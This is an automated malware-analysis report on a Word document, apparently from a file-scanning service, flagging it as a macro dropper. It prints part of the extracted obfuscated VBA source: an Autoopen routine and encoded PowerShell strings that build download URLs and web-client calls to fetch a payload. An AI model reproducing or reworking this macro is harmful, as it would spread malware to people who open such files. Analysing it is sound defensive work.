MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Word document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious intent, suggesting it's designed to download and execute a secondary payload. The presence of ClamAV detection for 'Doc.Dropper.Agent-6546450-0' further supports its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546353-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546353-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 129659 bytes |
SHA-256: a0bf70c286ac8da0fd296ab4516ab6f5179a64e98895b16b307ca7175d168d89 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MjtwMfazQA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dFnKn(kcZTz)
PztzO = ImTmM
TRnqS = dfOSKz + CDbl(82980 - PSXABz - JiPRF + CDbl(40334)) - 91429 - CDbl(60760)
jrtbrW = uKwpS
znuGQ = 89482
End Sub
Sub PTkMuK(YYNHiA)
lSGPGs = cqEKz
lbXwE = pPNGj + CDbl(64211 - nuVwoH - XMVnr + CDbl(18004)) - 3264 - CDbl(79893)
dfCvIz = BOChKU
LaiaF = 11321
tQDhi = FkHvz
ckbim = qzUil + CDbl(49963 - CoJMJ - wjijPz + CDbl(27404)) - 58702 - CDbl(46946)
QHHhJr = kwvCPI
KidZbk = 91994
wMCQz = LiXtR
Dbisz = AZQNj + CDbl(63792 - sZkWoC - vtIvit + CDbl(88383)) - 74911 - CDbl(46950)
YJzCj = AlbQkW
ljVpF = 52847
End Sub
Sub IiqiKK(jNEQN)
zoWjY = pklNl
ZmXOJ = oLzIp + CDbl(37682 - rYQRX - AWVHw + CDbl(19330)) - 73332 - CDbl(32587)
lqXVEa = YvUEBc
DqzCQ = 63454
ZTNqlj = ibEXm
ZHkTPs = AVwTV + CDbl(44808 - RRwHV - MMWKiS + CDbl(88771)) - 64396 - CDbl(87996)
PjOlc = FjnXaj
XtVOM = 74608
End Sub
Sub Autoopen()
On Error Resume Next
izBCi = kaozw
GAjmH = sVLQTw + CDbl(17331 - IzRJDh - jpSfLH + CDbl(28972)) - 21855 - CDbl(60901)
qZCdDq = NdURC
dCtBE = 72084
zbFMQii (ftQda + DSBvnYXniSDYD + OHvdc)
fZdZG = FJKvaN
dbpcSG = ZWLwI + CDbl(47092 - sbzSz - IWozdn + CDbl(2639)) - 99412 - CDbl(54231)
jSCAwj = idWSj
NjQiw = 25248
End Sub
Sub LdbWUH(pzfFKz)
cdFXG = CVpcY
NbSNE = mumFr + CDbl(62673 - pwjfzR - mklCK + CDbl(20404)) - 80426 - CDbl(8655)
qnwzwt = WlaAX
lWmZr = 34038
SqrKQ = dqPDuO
PwSsij = lNtXRk + CDbl(67474 - OQlTYs - zwnhK + CDbl(30131)) - 40966 - CDbl(12887)
jlpnpE = qIVaFw
tfDfb = 98721
bqpCw = FBYjP
Lrfuv = KXuLC + CDbl(33705 - DcuBH - tHQEuA + CDbl(71128)) - 85520 - CDbl(66991)
pjpLwl = OlHVRc
QoYut = 86488
End Sub
Sub zRvWz(mkuKQb)
FbMGJR = fQzOb
toGcqz = dqRuoz + CDbl(81913 - dqzEqs - ocRlb + CDbl(85809)) - 59500 - CDbl(65745)
juTBz = SURlFP
SRKbK = 4244
End Sub
Attribute VB_Name = "CJlmbAdKEXz"
Sub IANufo(zYcmFn)
iKAbA = cHOWJh
zAHPuo = HJEWi + CDbl(73833 - CCaWj - YWTJcW + CDbl(29479)) - 41781 - CDbl(373)
qlzOuw = MsRjv
FdwOP = 49570
End Sub
Function DSBvnYXniSDYD()
On Error Resume Next
ozciC = jznXYl
YNlhY = ElNiP + CDbl(36609 - BOjjIA - uzqIPL + CDbl(37778)) - 34676 - CDbl(35830)
Usuow = sPpqVU
VNPZZS = 33858
hnZIY = WwkKW
dEdPD = PwhnmT + CDbl(6116 - CDOrZ - uhTmt + CDbl(14422)) - 6841 - CDbl(90486)
UjsDYb = uoVZj
suBFE = 24898
ZVEzYij = ZHhJP("%Ll0,k0)'x'+]31[dIlLEhS$+]1[DiLLeHs$ ( &|)93]rAhCnz", 74930 + 3 - 74930, 74930 + 42 - 74930)
TjtkM = vlqWw
UYNDtQ = kpIaVA + CDbl(51481 - oZlnCq - GkqHrL + CDbl(60301)) - 54007 - CDbl(6950)
ZtOpi = HpZcZK
XklfG = 22186
Wruqaq = fsboWw
btCzh = wUqPw + CDbl(53493 - anVnV - Dukmi + CDbl(53174)) - 8642 - CDbl(40417)
uFIkbB = tQIYBk
Aiswi = 37913
PXODrqvnmz = ZHhJP("4zziVVadjQ+djQrtnicalleidj'+'Q+djQzarg/'+'/djQ+djQ:ptth xGdjQ+djQS =djQ+djQ djQ+djQXdjQ+djQCDAUIG;'+'djQ+djQ)3djQ+djQ312'+'82 ,0000djQ+djQ'+'1(txendjQ+djQ.djQ+djQdsadaVS", 10227 + 3 - 10227, 10227 + 161 - 10227)
WnSDuT = GYYdlI
lHNAK = uFiwRS + CDbl(86013 - HldaBv - Rphjh + CDbl(70599)) - 73970 - CDbl(84084)
vQccPX = zTVzRI
lcbHz = 74662
fICQY = DuzKS
qYYavc = jkGNN + CDbl(33873 - VuKLP - WOjYN + CDbl(61089)) - 61830 - CDbl(13251)
Qwazdt = kdNsZI
YuozAm = 16190
XJDwXMQEPaL = ZHhJP("2PjetsydjQ+djQS )xGStcdjQ+djQejdjQ+djQbo-djQ+djQxGS+djQ+djQxd'+'jQ+djQGSwxGS+xGSenxGS(. =djQ+djQ U'+'YYUIG;modnar )djQ+djQxdjQ+djQGdjQ+djQStxGS+xGScdjQ+djQejbo-wxGdjQ+djQS+djQ+djQxdjQ+djQ3uKn", 90077 + 5 - 90077, 90077 + 184 - 90077)
ouGYcp = NPvtp
ImQoi = KhzXl + CDbl(27432 - KdYjfU - hKfqFR + CDbl(12078)) - 68647 - CDbl(30515)
wjSTQI = LWMzC
XVJBiX = 78045
abTBtz = OtcLG
WrKnAa = rZoDvo + CDbl(25653 - IvFDQ - TIimUG + CDbl(8706)) - 12647 - CDbl(26476)
mzGZz = ClTKr
nQFEm = 22635
GoTzuDwBL = ZHhJP("kQbQth@/B1hadjQ+djQ/mocdjQ+djQ.shcbid'+'jQ+djQ//:'+'ptdjQ+djQthdjQ+djQ@/q7MLI/ta.g-h//:pdjQ+djQtth@/djQ+djQ6djQ+djQ9djQ+djQqpdjQ+djQdd
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.